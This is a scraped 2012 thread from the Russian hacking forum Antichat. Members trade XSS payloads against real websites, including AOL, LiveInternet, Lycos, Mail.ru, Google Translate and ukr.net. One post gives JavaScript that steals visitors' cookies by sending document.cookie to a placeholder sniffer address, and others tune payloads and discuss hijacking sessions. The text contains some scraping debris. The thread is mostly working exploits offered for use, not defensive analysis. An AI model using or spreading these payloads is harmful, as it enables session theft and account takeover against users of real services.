ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
23.01.2012, 21:06
|
|
Guest
Сообщений: n/a
Провел на форуме:
0
Репутация:
49
|
|
http://techguru.aol.com/?ncid=txtlnkusstor00000094">alert(String.fromCharCode(88,83,83,32,65,78,84,7 3,67,72,65,84))
|
|
|
|
26.01.2012, 21:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
45485
Репутация:
1
|
|
LiveInternet
Код:
Code:
http://www.liveinternet.ru/jsearch/?s=">alert('xss')
|
|
|
|
30.01.2012, 16:19
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
тИЦ 100
PR 7
Код:
Code:
http://games.lycos.com/board-game/gacopyrze-vs_-wilkolkialert(document.cookie)/
|
|
|
|
02.02.2012, 19:06
|
|
Guest
Сообщений: n/a
Провел на форуме:
45485
Репутация:
1
|
|
Mail.ru
Код:
Code:
http://apps.hi-tech.mail.ru/contest/add/?comment=&Domain=mail.ru&Login=&Password=&platform=">alert('xss')
|
|
|
|
04.02.2012, 10:27
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
kravch_v, не надо юзать HTML, если XSS внутри JS-кода.
http://apps.hi-tech.mail.ru/contest/add/?platform='%3Balert('xss')%3Ba='
|
|
|
04.02.2012, 19:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
45485
Репутация:
1
|
|
M_script, спасибо!
Google XSS
Код:
Code:
http://translate.google.ru/translate?sl=en&tl=ru&js=n&prev=_t&hl=ru&ie=UTF-8&layout=2&eotf=1&u=http://ссылка_на_уязвимый_код
Пример:
Код:
Code:
http://translate.google.ru/translate?sl=en&tl=ru&js=n&prev=_t&hl=ru&ie=UTF-8&layout=2&eotf=1&u=http://exploit-db.ru/googlexss/
Для кражи кук используйте следующий код:
Код:
Code:
img = new Image(); img.src = "http://адрес_сниффера.gif?"+document.cookie;
// M_script, то сообщение кто-то удалил. Печеньки я каким-то образом крал. Пассивки на ютубе нету. |
|
|
|
04.02.2012, 20:12
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
kravch_v, ты в начале января уже выкладывал эту XSSку на гугле. Там выполнение JS-кода происходит не на google.ru(com), а на googleusercontent.com. Соответственно, куки будут с домена googleusercontent.com. Как их можно использовать на практике?
upd:
Сообщение от kravch_v
kravch_v said:
Печеньки я каким-то образом крал
Куки на googleusercontent.com есть и украсть их можно, но в них не содержится сессии google.com
|
|
|
|
05.02.2012, 01:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
45485
Репутация:
1
|
|
Mail.Ru - Недостаточная фильтрация в cookie
Уязвимый код (cookie):
Код:
Code:
Mpop=test:test:test@test.ru">alert('xss');
Заходим на w2.dwar.mail.ru и код успешно выполняется. |
|
|
|
05.02.2012, 13:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
0
Репутация:
6
|
|
Почта Укр.нет
[HTML]
HTML:
http://kino.ukr.net/search?query="+onMouseover=alert(document.cookie)+ ">+
[/QUOTE]
" if author else f"
По сути можно поставить onerror и onload, нужно только подумать как .
|
|
|
|
05.02.2012, 13:56
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
[QUOTE="Unix@"]
Unix@ said:
http://kino.ukr.net/search?query="+onMouseover=alert(document.cookie)+ ">++
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
